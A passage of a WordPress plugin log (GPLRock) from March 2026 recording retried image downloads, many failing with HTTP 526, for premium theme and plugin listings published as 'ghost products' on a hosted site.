(attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/new-learning--premium-moodle-theme-3190.webp for product new-learning-premium-moodle-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:26 UTC] GPLRock WARNING: Image download failed for product new-learning-premium-moodle-theme. URL: https://meldwp.com/wp-content/uploads/new-learning--premium-moodle-theme-3190.webp [16-Mar-2026 17:27:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: new-learning-premium-moodle-theme [16-Mar-2026 17:27:26 UTC] GPLRock: Image download failed for product woodex-carpenter-and-craftman-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:28 UTC] GPLRock: Image download failed for product woodex-carpenter-and-craftman-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woodex---carpenter-and-craftman-business-wordpress-theme-22255.webp for product woodex-carpenter-and-craftman-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:31 UTC] GPLRock: Image download failed for product woodex-carpenter-and-craftman-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:33 UTC] GPLRock: Image download failed for product woodex-carpenter-and-craftman-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woodex---carpenter-and-craftman-business-wordpress-theme-22255.webp for product woodex-carpenter-and-craftman-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:35 UTC] GPLRock WARNING: Image download failed for product woodex-carpenter-and-craftman-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/woodex---carpenter-and-craftman-business-wordpress-theme-22255.webp [16-Mar-2026 17:27:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woodex-carpenter-and-craftman-business-wordpress-theme [16-Mar-2026 17:27:35 UTC] GPLRock: Image download failed for product admiral-unique-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:37 UTC] GPLRock: Image download failed for product admiral-unique-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/admiral---unique-multipurpose-wordpress-theme-17246.webp for product admiral-unique-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:40 UTC] GPLRock: Image download failed for product admiral-unique-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:42 UTC] GPLRock: Image download failed for product admiral-unique-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/admiral---unique-multipurpose-wordpress-theme-17246.webp for product admiral-unique-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:44 UTC] GPLRock WARNING: Image download failed for product admiral-unique-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/admiral---unique-multipurpose-wordpress-theme-17246.webp [16-Mar-2026 17:27:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: admiral-unique-multipurpose-wordpress-theme [16-Mar-2026 17:27:53 UTC] GPLRock: Image downloaded successfully for product cryptibit-technology-cryptocurrency-ico-ieo-landing-page-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1876d898.jpg [16-Mar-2026 17:27:54 UTC] GPLRock: Using pre-downloaded image for product cryptibit-technology-cryptocurrency-ico-ieo-landing-page-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1876d898.jpg [16-Mar-2026 17:27:54 UTC] GPLRock: Ghost product published with image - Product ID: cryptibit-technology-cryptocurrency-ico-ieo-landing-page-wordpress-theme [16-Mar-2026 17:27:55 UTC] GPLRock: Image downloaded successfully for product edema-wellness-spa-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-764f08d6.jpg [16-Mar-2026 17:27:55 UTC] GPLRock: Using pre-downloaded image for product edema-wellness-spa-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-764f08d6.jpg [16-Mar-2026 17:27:55 UTC] GPLRock: Ghost product published with image - Product ID: edema-wellness-spa-wordpress-theme [16-Mar-2026 17:27:57 UTC] GPLRock: Image downloaded successfully for product rocket-creative-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3336f90.jpg [16-Mar-2026 17:27:57 UTC] GPLRock: Using pre-downloaded image for product rocket-creative-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3336f90.jpg [16-Mar-2026 17:27:57 UTC] GPLRock: Ghost product published with image - Product ID: rocket-creative-multipurpose-wordpress-theme [16-Mar-2026 17:27:58 UTC] GPLRock: Image downloaded successfully for product autoser-car-repair-and-auto-service-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e64575bf.jpg [16-Mar-2026 17:27:58 UTC] GPLRock: Using pre-downloaded image for product autoser-car-repair-and-auto-service-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e64575bf.jpg [16-Mar-2026 17:27:58 UTC] GPLRock: Ghost product published with image - Product ID: autoser-car-repair-and-auto-service-wordpress-theme [16-Mar-2026 17:28:00 UTC] GPLRock: Image downloaded successfully for product adning-advertising-professional-all-in-one-ad-manager-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-222baea9.png [16-Mar-2026 17:28:00 UTC] GPLRock: Using pre-downloaded image for product adning-advertising-professional-all-in-one-ad-manager-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-222baea9.png [16-Mar-2026 17:28:00 UTC] GPLRock: Ghost product published with image - Product ID: adning-advertising-professional-all-in-one-ad-manager-for-wordpress [16-Mar-2026 17:28:01 UTC] GPLRock: Image downloaded successfully for product gravity-perks-preview-submission-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb8903ad.jpg [16-Mar-2026 17:28:01 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-preview-submission-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb8903ad.jpg [16-Mar-2026 17:28:01 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-preview-submission-plugin [16-Mar-2026 17:28:03 UTC] GPLRock: Image downloaded successfully for product avaz-fashion-responsive-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae4a2ca3.jpg [16-Mar-2026 17:28:03 UTC] GPLRock: Using pre-downloaded image for product avaz-fashion-responsive-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae4a2ca3.jpg [16-Mar-2026 17:28:03 UTC] GPLRock: Ghost product published with image - Product ID: avaz-fashion-responsive-woocommerce-wordpress-theme [16-Mar-2026 17:28:04 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-acquisition-survey-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6f4f82c2.jpg [16-Mar-2026 17:28:04 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-acquisition-survey-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6f4f82c2.jpg [16-Mar-2026 17:28:04 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-acquisition-survey-addon [16-Mar-2026 17:28:06 UTC] GPLRock: Image downloaded successfully for product aldo-black-and-white-gutenberg-blog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-08125910.png [16-Mar-2026 17:28:07 UTC] GPLRock: Using pre-downloaded image for product aldo-black-and-white-gutenberg-blog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-08125910.png [16-Mar-2026 17:28:07 UTC] GPLRock: Ghost product published with image - Product ID: aldo-black-and-white-gutenberg-blog-wordpress-theme [16-Mar-2026 17:28:08 UTC] GPLRock: Image downloaded successfully for product beeta-multipurpose-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e7287bb.jpg [16-Mar-2026 17:28:08 UTC] GPLRock: Using pre-downloaded image for product beeta-multipurpose-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e7287bb.jpg [16-Mar-2026 17:28:08 UTC] GPLRock: Ghost product published with image - Product ID: beeta-multipurpose-woocommerce-theme [16-Mar-2026 17:29:28 UTC] GPLRock: Image download failed for product ecode-wp-multipurpose-woocommerce-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:30 UTC] GPLRock: Image download failed for product ecode-wp-multipurpose-woocommerce-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecode-wp---multipurpose-woocommerce-elementor-theme-24897.webp for product ecode-wp-multipurpose-woocommerce-elementor-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:29:33 UTC] GPLRock: Image download failed for product ecode-wp-multipurpose-woocommerce-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:35 UTC] GPLRock: Image download failed for product ecode-wp-multipurpose-woocommerce-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecode-wp---multipurpose-woocommerce-elementor-theme-24897.webp for product ecode-wp-multipurpose-woocommerce-elementor-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:29:37 UTC] GPLRock WARNING: Image download failed for product ecode-wp-multipurpose-woocommerce-elementor-theme. URL: https://meldwp.com/wp-content/uploads/ecode-wp---multipurpose-woocommerce-elementor-theme-24897.webp [16-Mar-2026 17:29:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecode-wp-multipurpose-woocommerce-elementor-theme [16-Mar-2026 17:29:37 UTC] GPLRock: Image downloaded successfully for product tekup-technology-it-solutions-services-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ac707c4.webp [16-Mar-2026 17:29:37 UTC] GPLRock: Using pre-downloaded image for product tekup-technology-it-solutions-services-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ac707c4.webp [16-Mar-2026 17:29:37 UTC] GPLRock: Ghost product published with image - Product ID: tekup-technology-it-solutions-services-wordpress-theme [16-Mar-2026 17:29:38 UTC] GPLRock: Image downloaded successfully for product yog-modern-yoga-fitness-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-381efa1b.webp [16-Mar-2026 17:29:38 UTC] GPLRock: Using pre-downloaded image for product yog-modern-yoga-fitness-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-381efa1b.webp [16-Mar-2026 17:29:38 UTC] GPLRock: Ghost product published with image - Product ID: yog-modern-yoga-fitness-wordpress-theme [16-Mar-2026 17:29:38 UTC] GPLRock: Image download failed for product zunzo-running-club-and-sports-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:40 UTC] GPLRock: Image download failed for product zunzo-running-club-and-sports-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zunzo---running-club-and-sports-woocommerce-theme-1358.webp for product zunzo-running-club-and-sports-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:29:42 UTC] GPLRock: Image download failed for product zunzo-running-club-and-sports-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:44 UTC] GPLRock: Image download failed for product zunzo-running-club-and-sports-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zunzo---running-club-and-sports-woocommerce-theme-1358.webp for product zunzo-running-club-and-sports-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:29:47 UTC] GPLRock WARNING: Image download failed for product zunzo-running-club-and-sports-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/zunzo---running-club-and-sports-woocommerce-theme-1358.webp [16-Mar-2026 17:29:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zunzo-running-club-and-sports-woocommerce-theme [16-Mar-2026 17:29:47 UTC] GPLRock: Image downloaded successfully for product medxtore-responsive-multipurpose-elementor-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1040f9b.webp [16-Mar-2026 17:29:47 UTC] GPLRock: Using pre-downloaded image for product medxtore-responsive-multipurpose-elementor-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1040f9b.webp [16-Mar-2026 17:29:47 UTC] GPLRock: Ghost product published with image - Product ID: medxtore-responsive-multipurpose-elementor-woocommerce-wordpress-theme [16-Mar-2026 17:29:47 UTC] GPLRock: Image download failed for product daltech-it-solutions-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:49 UTC] GPLRock: Image download failed for product daltech-it-solutions-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/daltech---it-solutions--technology-wordpress-theme-8636.webp for product daltech-it-solutions-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:29:51 UTC] GPLRock: Image download failed for product daltech-it-solutions-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:53 UTC] GPLRock: Image download failed for product daltech-it-solutions-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/daltech---it-solutions--technology-wordpress-theme-8636.webp for product daltech-it-solutions-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:29:55 UTC] GPLRock WARNING: Image download failed for product daltech-it-solutions-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/daltech---it-solutions--technology-wordpress-theme-8636.webp [16-Mar-2026 17:29:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: daltech-it-solutions-technology-wordpress-theme [16-Mar-2026 17:29:56 UTC] GPLRock: Image download failed for product pome-food-store-grocery-marketplace-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:29:58 UTC] GPLRock: Image download failed for product pome-food-store-grocery-marketplace-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pome---food-store--grocery-marketplace-wordpress-theme-7526.webp for product pome-food-store-grocery-marketplace-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:30:00 UTC] GPLRock: Image download failed for product pome-food-store-grocery-marketplace-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:02 UTC] GPLRock: Image download failed for product pome-food-store-grocery-marketplace-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pome---food-store--grocery-marketplace-wordpress-theme-7526.webp for product pome-food-store-grocery-marketplace-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:30:04 UTC] GPLRock WARNING: Image download failed for product pome-food-store-grocery-marketplace-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pome---food-store--grocery-marketplace-wordpress-theme-7526.webp [16-Mar-2026 17:30:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pome-food-store-grocery-marketplace-wordpress-theme [16-Mar-2026 17:30:05 UTC] GPLRock: Image download failed for product seocrawler-seo-marketing-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:07 UTC] GPLRock: Image download failed for product seocrawler-seo-marketing-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seocrawler---seo--marketing-agency-wordpress-32991.webp for product seocrawler-seo-marketing-agency-wordpress after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:30:09 UTC] GPLRock: Image download failed for product seocrawler-seo-marketing-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:11 UTC] GPLRock: Image download failed for product seocrawler-seo-marketing-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seocrawler---seo--marketing-agency-wordpress-32991.webp for product seocrawler-seo-marketing-agency-wordpress after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:30:13 UTC] GPLRock WARNING: Image download failed for product seocrawler-seo-marketing-agency-wordpress. URL: https://meldwp.com/wp-content/uploads/seocrawler---seo--marketing-agency-wordpress-32991.webp [16-Mar-2026 17:30:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: seocrawler-seo-marketing-agency-wordpress [16-Mar-2026 17:30:13 UTC] GPLRock: Image downloaded successfully for product opeka-senior-care-elderly-nursing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd0ea373.webp [16-Mar-2026 17:30:13 UTC] GPLRock: Using pre-downloaded image for product opeka-senior-care-elderly-nursing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd0ea373.webp [16-Mar-2026 17:30:13 UTC] GPLRock: Ghost product published with image - Product ID: opeka-senior-care-elderly-nursing-wordpress-theme [16-Mar-2026 17:30:14 UTC] GPLRock: Image download failed for product politaro-political-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:16 UTC] GPLRock: Image download failed for product politaro-political-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/politaro---political-wordpress-theme-28876.webp for product politaro-political-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:30:18 UTC] GPLRock: Image download failed for product politaro-political-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:20 UTC] GPLRock: Image download failed for product politaro-political-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:30:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/politaro---political-wordpress-theme-28876.webp for product politaro-political-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:30:22 UTC] GPLRock WARNING: Image download failed for product politaro-political-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/politaro---political-wordpress-theme-28876.webp [16-Mar-2026 17:30:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: politaro-political-wordpress-theme [17-Mar-2026 01:09:41 UTC] GPLRock: Image download failed for product cobble-flooring-construction-wordpress-theme-ai (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:09:43 UTC] GPLRock: Image download failed for product cobble-flooring-construction-wordpress-theme-ai (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:09:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cobble---flooring--construction-wordpress-theme--ai-22597.webp for product cobble-flooring-construction-wordpress-theme-ai after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:09:46 UTC] GPLRock: Image download failed for product cobble-flooring-construction-wordpress-theme-ai (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:09:48 UTC] GPLRock: Image download failed for product cobble-flooring-construction-wordpress-theme-ai (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:09:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cobble---flooring--construction-wordpress-theme--ai-22597.webp for product cobble-flooring-construction-wordpress-theme-ai after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:09:50 UTC] GPLRock WARNING: Image download failed for product cobble-flooring-construction-wordpress-theme-ai. URL: https://meldwp.com/wp-content/uploads/cobble---flooring--construction-wordpress-theme--ai-22597.webp [17-Mar-2026 01:09:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cobble-flooring-construction-wordpress-theme-ai [17-Mar-2026 01:09:50 UTC] GPLRock: Image download failed for product jude-nail-bar-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:09:52 UTC] GPLRock: Image download failed for product jude-nail-bar-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:09:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jude--nail-bar--beauty-salon-wordpress-theme-15164.webp for product jude-nail-bar-beauty-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:09:55 UTC] GPLRock: Image download failed for product jude-nail-bar-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:09:57 UTC] GPLRock: Image download failed for product jude-nail-bar-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:09:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jude--nail-bar--beauty-salon-wordpress-theme-15164.webp for product jude-nail-bar-beauty-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:09:59 UTC] GPLRock WARNING: Image download failed for product jude-nail-bar-beauty-salon-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/jude--nail-bar--beauty-salon-wordpress-theme-15164.webp [17-Mar-2026 01:09:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jude-nail-bar-beauty-salon-wordpress-theme [17-Mar-2026 01:09:59 UTC] GPLRock: Image download failed for product stynirk-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:01 UTC] GPLRock: Image download failed for product stynirk-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stynirk---single-property-wordpress-theme-24649.webp for product stynirk-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:10:04 UTC] GPLRock: Image download failed for product stynirk-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:06 UTC] GPLRock: Image download failed for product stynirk-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stynirk---single-property-wordpress-theme-24649.webp for product stynirk-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:10:08 UTC] GPLRock WARNING: Image download failed for product stynirk-single-property-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/stynirk---single-property-wordpress-theme-24649.webp [17-Mar-2026 01:10:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stynirk-single-property-wordpress-theme [17-Mar-2026 01:10:08 UTC] GPLRock: Image download failed for product veg-point-wp-multipurpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:10 UTC] GPLRock: Image download failed for product veg-point-wp-multipurpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/veg-point-wp---multipurpose-elementor-woocommerce-theme-11341.webp for product veg-point-wp-multipurpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:10:12 UTC] GPLRock: Image download failed for product veg-point-wp-multipurpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:14 UTC] GPLRock: Image download failed for product veg-point-wp-multipurpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/veg-point-wp---multipurpose-elementor-woocommerce-theme-11341.webp for product veg-point-wp-multipurpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:10:16 UTC] GPLRock WARNING: Image download failed for product veg-point-wp-multipurpose-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/veg-point-wp---multipurpose-elementor-woocommerce-theme-11341.webp [17-Mar-2026 01:10:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: veg-point-wp-multipurpose-elementor-woocommerce-theme [17-Mar-2026 01:10:17 UTC] GPLRock: Image download failed for product muscle-sports-center-solarium-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:19 UTC] GPLRock: Image download failed for product muscle-sports-center-solarium-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muscle---sports-center--solarium-wordpress-theme-29919.webp for product muscle-sports-center-solarium-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:10:21 UTC] GPLRock: Image download failed for product muscle-sports-center-solarium-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:23 UTC] GPLRock: Image download failed for product muscle-sports-center-solarium-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muscle---sports-center--solarium-wordpress-theme-29919.webp for product muscle-sports-center-solarium-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:10:25 UTC] GPLRock WARNING: Image download failed for product muscle-sports-center-solarium-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/muscle---sports-center--solarium-wordpress-theme-29919.webp [17-Mar-2026 01:10:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: muscle-sports-center-solarium-wordpress-theme [17-Mar-2026 01:10:25 UTC] GPLRock: Image download failed for product koka-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:28 UTC] GPLRock: Image download failed for product koka-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/koka---multipurpose-woocommerce-theme-5674.webp for product koka-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:10:30 UTC] GPLRock: Image download failed for product koka-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:32 UTC] GPLRock: Image download failed for product koka-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/koka---multipurpose-woocommerce-theme-5674.webp for product koka-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 01:10:34 UTC] GPLRock WARNING: Image download failed for product koka-multipurpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/koka---multipurpose-woocommerce-theme-5674.webp [17-Mar-2026 01:10:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - 